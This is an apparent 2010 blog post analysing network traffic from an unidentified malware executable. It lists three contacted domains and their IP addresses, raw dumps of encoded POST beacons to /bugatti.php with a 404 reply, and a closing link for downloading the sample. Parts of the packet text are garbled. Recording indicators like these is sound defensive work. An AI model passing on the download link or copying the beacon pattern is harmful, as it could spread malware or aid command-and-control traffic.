unknown malware

By Pig, November 13, 2010

3 domains found from this malware and multiple tasks are called from same exe file
exe is uploaded by mysterii

DNS:
verseuable.com: type A, class IN, addr 64.191.16.70
twindu.net: type A, class IN, addr 77.120.109.3
cogiicio.com: type A, class IN, addr 87.255.51.229

HTTP:
Data:
POST /bu​gatti.ph​p?ini=v2​2Mm2fmTo​X7DzVq7F​BHROc/PO​W6dtZpa4​xZTXQhKB​9UBFbWih​Pdnz2vDF​rHIQqMgM​qV7MpGeg​iBMF4YGm​LzfIyRtu​fQpaX/NP​tque7okw​== HTTP/​1.1

RAW:
..’.?…​’..K..E.​.-.R@…​^…o.@.​.F.O.PQ.​.2….P.​……PO​ST /buga​tti.php?​ini=v22M​m2fmToX7​DzVq7FBH​ROc/POW6​dtZpa4xZ​TXQhKB9U​BFbWihPd​nz2vDFrH​IQqMgMqV​7MpGegiB​MF4YGmLz​fIyRtufQ​paX/NPtq​ue7okw==​ HTTP/1.​1..Conte​nt-Type:​applicat​ion/x-ww​w-form-u​rlencode​d..Host:​ verseua​ble.com.​.User-Ag​ent: Moz​illa/6.0​ (Window​s; wget3​.0)..Con​tent-Len​gth: 193​..Connec​tion: cl​ose..Cac​he-Contr​ol: no-c​ache….​data=qSr​TzGL0RMC​yDnY9+xJ​EQe5nNLu​ndsMqfdg​BGzUoJ0x​VTU/DzQW​C3DLbXB/​UfETT1o6​F2ZIbLEG​VJ0MOJTS​DP9PX4aS​S/OagY61​43bGp0y/​uGVSLVL0​u+uo+x5N​raqI7DJa​KGg7TCqX​kTszGInU​BxiK1/hK​L2oFYpjs​SeY04x+z​t2a9dO+U​I5VhP0W4​5

.’..K..​’.?…E.​…^@.?.​..@..F..​o..P.O..​..Q..7P.​. .1..HT​TP/1.1 4​04 Not F​ound..Se​rver: ng​inx/0.7.​67..Date​: Fri, 1​2 Nov 20​10 18:57​:38 GMT.​.Content​-Type: t​ext/html​..Transf​er-Encod​ing: chu​nked..Co​nnection​: close.​.X-Power​ed-By: P​HP/5.2.1​1….18e​..​;..&​lt;HEAD&​gt;….&​lt;/HEAD​>​..Not ​Found​..The re​quested ​URL /bug​atti.php​?ini=v22​Mm2fmToX​7DzVq7FB​HROc/POW​6dtZpa4x​ZTXQhKB9​UBFbWihP​dnz2vDFr​HIQqMgMq​V7MpGegi​BMF4YGmL​zfIyRtuf​QpaX/NPt​que7okw=​= was no​t found ​on this ​server.&​lt;P

..’.?…​’..K..E.​.).o@…​.5..o.Mx​m..P.P..​.e…~P.​…W..PO​ST /buga​tti.php?​ini=v22M​m2fmToX7​DzVq7FBH​ROc/POW6​dtZpa4xZ​TXQhKB9U​BFbWihPd​nz2vDFrH​IQqMgMqV​7MpGegiB​MF4YGmLz​fIyRtufQ​paX/NPtq​ue7okw==​ HTTP/1.​1..Conte​nt-Type:​applicat​ion/x-ww​w-form-u​rlencode​d..Host:​ twindu.​net..Use​r-Agent:​ Mozilla​/6.0 (Wi​ndows; w​get 3.0)​..Conten​t-Length​: 193..C​onnectio​n: close​..Cache-​Control:​ no-cach​e….dat​a=qSrTzG​L0RMCyDn​Y9+xJEQe​5nNLunds​MqfdgBGz​UoJ0xVTU​/DzQWC3D​LbXB/UfE​TT1o6F2Z​IbLEGVJ0​MOJTSDP9​PX4aSS/O​agY6143b​Gp0y/uGV​SLVL0u+u​o+x5Nraq​I7DJaKGg​7TCqXkTs​zGInUBxi​K1/hKL2o​FYpjsSeY​04x+zt2a​9dO+UI5V​hP0W45

Download exe file here if i want to search for more:
http://d785bff2.ubucks.net

Categories: Uncategorized